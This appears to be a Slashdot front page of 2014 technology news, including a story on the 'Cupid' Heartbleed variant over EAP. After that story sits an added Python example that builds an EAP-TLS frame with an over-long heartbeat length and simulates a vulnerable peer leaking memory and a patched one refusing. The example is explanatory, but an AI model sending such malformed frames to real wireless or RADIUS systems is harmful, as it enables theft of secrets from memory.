By samzenpus from Slashdot's down-in-flames department
writes "Insecure by design and trusted by default, embedded systems present security concerns that could prove crippling if not addressed by fabricators, vendors, and customers alike, InfoWorld reports. Routers, smart refrigerators, in-pavement traffic-monitoring systems, or crop-monitoring drones — 'the trend toward systems and devices that, once deployed, stubbornly "keep on ticking" regardless of the wishes of those who deploy them is fast becoming an IT security nightmare made real, affecting everything from mom-and-pop shops to power stations. This unpatchable hell is a problem with many fathers, from recalcitrant vendors to customers wary of — or hostile to — change. But with the number and diversity of connected endpoints expected to skyrocket in the next decade, radical measures are fast becoming necessary to ensure that today's "smart" devices and embedded systems don't haunt us for years down the line.'"
By samzenpus from Slashdot's protect-ya-neck department
writes "While most organizations have patched the Heartbleed bug in their OpenSSL installations, a security expert has uncovered new vectors for exploiting the vulnerability, which can impact enterprise wireless networks, Android devices, and other connected devices. Dubbed 'Cupid,' the new attack method was recently presented by Portuguese security researcher Luis Grangeia, who debunked theories that Heartbleed could only be exploited over TCP connections, and after the TLS handshake. Unlike the initial Heartbleed attack, which took place on TLS connections over TCP, the Cupid attack happens on TLS connections over the Extensible Authentication Protocol (EAP), an authentication framework typically used in wireless networks and peer-to-peer connections.
The researcher has confirmed that default installations of wpa_supplicant, hostapd, and freeradius (RADIUS server implementation) can be exploited on Ubuntu if a vulnerable version of OpenSSL is utilized. Mobile devices running Android 4.1.0 and 4.1.1 also use wpa_supplicant to connect to wireless networks, so they're also affected. Everything that uses OpenSSL for EAP TLS is susceptible to Cupid attacks. While he hasn't been able to confirm it, the expert believes iPhones, iPads, OS X, other RADIUS servers besides freeradius, VoIP phones, printers, and various commercial managed wireless solutions could be affected."
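To make concrete what "TLS over EAP" means in the submission above, the following Python is an added example written for this page; it is not code from Grangeia's talk or from the wpa_supplicant, hostapd or freeradius projects. It builds a TLS heartbeat record (RFC 6520), wraps it in an EAP-TLS response frame (RFC 5216, the layer that EAPOL and RADIUS then carry), and models the peer's heartbeat handling with and without the payload-length check that the Heartbleed fix restores. The `trailing_memory` bytes and the secret placed in them are constructed for the example and stand in for whatever happens to follow the record in the process heap; a real Cupid run would send this frame over 802.1X to an access point or RADIUS server, which this example does not do.

```python
import struct

# Protocol constants taken from the RFCs, not from any exploit tool.
EAP_CODE_RESPONSE = 2      # RFC 3748 EAP code
EAP_TYPE_TLS = 13          # RFC 5216 EAP-TLS method type
EAP_TLS_FLAG_L = 0x80      # "TLS message length included" flag
TLS_CT_HEARTBEAT = 24      # RFC 6520 heartbeat content type
HB_REQUEST = 1
HB_PADDING = 16            # RFC 6520 minimum padding after the payload


def build_heartbeat_record(declared_len, payload, tls_version=b"\x03\x01"):
    """TLS record carrying a HeartbeatRequest whose payload_length field says
    declared_len, regardless of how many payload bytes actually follow."""
    msg = struct.pack("!BH", HB_REQUEST, declared_len) + payload + b"\x00" * HB_PADDING
    return struct.pack("!B2sH", TLS_CT_HEARTBEAT, tls_version, len(msg)) + msg


def build_eap_tls(identifier, tls_data):
    """Wrap TLS bytes in an EAP-TLS Response (RFC 5216 section 3.1):
    code | identifier | length | type=13 | flags | [tls_len] | tls_data."""
    body = struct.pack("!BBI", EAP_TYPE_TLS, EAP_TLS_FLAG_L, len(tls_data)) + tls_data
    return struct.pack("!BBH", EAP_CODE_RESPONSE, identifier, 4 + len(body)) + body


def parse_eap_tls(pkt):
    """Return the TLS bytes carried by an EAP-TLS packet, or None if malformed."""
    if len(pkt) < 6:
        return None
    _code, _identifier, length = struct.unpack("!BBH", pkt[:4])
    eap_type, flags = pkt[4], pkt[5]
    if eap_type != EAP_TYPE_TLS or length > len(pkt):
        return None
    offset = 6
    if flags & EAP_TLS_FLAG_L:
        offset += 4  # skip the 4-byte TLS message length
    return pkt[offset:length]


def heartbeat_respond(tls_record, trailing_memory, check_bounds):
    """Model the peer's heartbeat handling (constructed for this example).

    check_bounds=False reproduces the Heartbleed defect: payload_length is
    trusted and that many bytes are copied into the response, running past
    the received record into trailing_memory.  check_bounds=True applies the
    RFC 6520 rule that the OpenSSL fix enforces: discard the message if the
    declared payload plus padding does not fit inside the received record.
    Returns the echoed bytes, or None when the message is discarded."""
    if len(tls_record) < 5:
        return None
    content_type, _version, record_len = struct.unpack("!B2sH", tls_record[:5])
    if content_type != TLS_CT_HEARTBEAT:
        return None
    body = tls_record[5:5 + record_len]
    if len(body) < 3:
        return None
    hb_type, declared_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return None
    if check_bounds and 1 + 2 + declared_len + HB_PADDING > record_len:
        return None  # RFC 6520: silently discard an over-long payload_length
    heap = body + trailing_memory          # what memcpy would actually read from
    return heap[3:3 + declared_len]        # echo "payload_length" bytes back


if __name__ == "__main__":
    secret = b"corp-wifi-radius-secret"   # constructed stand-in for heap contents
    frame = build_eap_tls(7, build_heartbeat_record(64, b"ping"))
    inner = parse_eap_tls(frame)
    leaked = heartbeat_respond(inner, secret + b"\x00" * 100, check_bounds=False)
    print("vulnerable peer echoed", len(leaked), "bytes; secret present:", secret in leaked)
    print("patched peer response:", heartbeat_respond(inner, secret, check_bounds=True))
```

The frame is a plain EAP-TLS response, so nothing in it depends on session keys or on the handshake having completed; the only difference between the two runs is the single length comparison in `heartbeat_respond`, which is why the fix for Cupid is the same OpenSSL update as for the TCP case.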
By timothy from Slashdot's once-in-a-while-justice-peeks-through department
We mentioned last year that FindTheBest CEO Kevin O'Connor had taken an unusual step, when confronted with a demand by patent troll company Lumen View that the startup pay $50,000 for what struck O'Connor as a frivolous patent: He not only refused, but pledged to spend a million bucks, if necessary, to fight Lumen View in court. Now, as Ars Technica reports, O'Connor has succeeded on a grand scale. Before trouncing Lumen View in court, Ars reports, "FindTheBest had spent about $200,000 on its legal fight—not to mention the productivity lost in hundreds of work hours spent by top executives on the lawsuit, and three all-company meetings.
Now the judge overseeing the case has ruled (PDF) that it's Lumen View, not FindTheBest, that should have to pay those expenses. In a first-of-its-kind implementation of new fee-shifting rules mandated by the Supreme Court, US District Judge Denise Cote found that the Lumen View lawsuit was a 'prototypical exceptional case.'"
By timothy from Slashdot's complicated-model department
As The Next Web reports, Samsung is finally bringing to market (in Russia, to start) a phone, the Samsung Z, running the Tizen OS. Like Android, Tizen is based on the Linux kernel, but it's intended for HTML5 apps rather than Android apps. It's not Samsung's first Tizen device, though; the second generation of its Gear smartwatches runs Tizen as well. "Samsung earlier revealed plans for its first Tizen smartphones to be launched during its second quarter of business in 2014, which runs April to July, so it seems like smartphones other than Samsung Z could still be on their way. The Samsung executive said that Tizen devices could account for as much as 15 percent of Samsung's mobile shipments per year, but Android will still be its main business."
By timothy from Slashdot's where-liddy-was-wrong department
Daniel Ellsberg, no slouch himself in bringing to public awareness documents that reveal uncomfortable facts about government operations, says that "Edward Snowden is the greatest patriot whistleblower of our time." Ellsberg says, in an editorial at The Guardian pointed out by reader ABEND (15913), that Snowden cannot receive a fair trial without reform of the Espionage Act. According to Ellsberg, "Snowden would come back home to a jail cell – and not just an ordinary cell-block but isolation in solitary confinement, not just for months like Chelsea Manning but for the rest of his sentence, and probably the rest of his life. His legal adviser, Ben Wizner, told me that he estimates Snowden's chance of being allowed out on bail as zero. (I was out on bond, speaking against the Vietnam war, the whole 23 months I was under indictment). More importantly, the current state of whistleblowing prosecutions under the Espionage Act makes a truly fair trial wholly unavailable to an American who has exposed classified wrongdoing. Legal scholars have strongly argued that the US supreme court – which has never yet addressed the constitutionality of applying the Espionage Act to leaks to the American public – should find the use of it overbroad and unconstitutional in the absence of a public interest defense. The Espionage Act, as applied to whistleblowers, violates the First Amendment, is what they're saying. As I know from my own case, even Snowden's own testimony on the stand would be gagged by government objections and the (arguably unconstitutional) nature of his charges. That was my own experience in court, as the first American to be prosecuted under the Espionage Act – or any other statute – for giving information to the American people."
Ellsberg rejects the distinction John Kerry drew in praising Ellsberg's own whistleblowing as patriotic while calling Snowden's cowardly and traitorous.
By timothy from Slashdot's news-for-nerds department
New submitter Bodhammer (559311) writes "German researchers looked at the brains of 64 men between the ages of 21 and 45 and found that one brain region (the striatum, linked to reward processing), was smaller in the brains of porn watchers, and that a specific part of the same region is also less activated when exposed to more pornography."
While it's tempting to cast blame, "the study doesn't confirm whether watching porn causes the changes, or whether people with a certain brain type are inherently more apt to tune into X-rated content." The study's abstract is available; the paper itself is pay-walled.
By timothy from Slashdot's maybe-your-canary-needs-a-canary department
writes "I use Truecrypt, but recently someone pointed me to the SourceForge page of Truecrypt that says it's out of business. I found the message weird, but now there's an explanation: Truecrypt has received a letter from the NSA."
Anyone with a firmer source (or who can debunk the claim), please chime in below; considering the fate of Lavabit, it sure sounds plausible. PCWorld lists some alternative software, for Windows users in particular, but do you believe that Microsoft's BitLocker is more secure?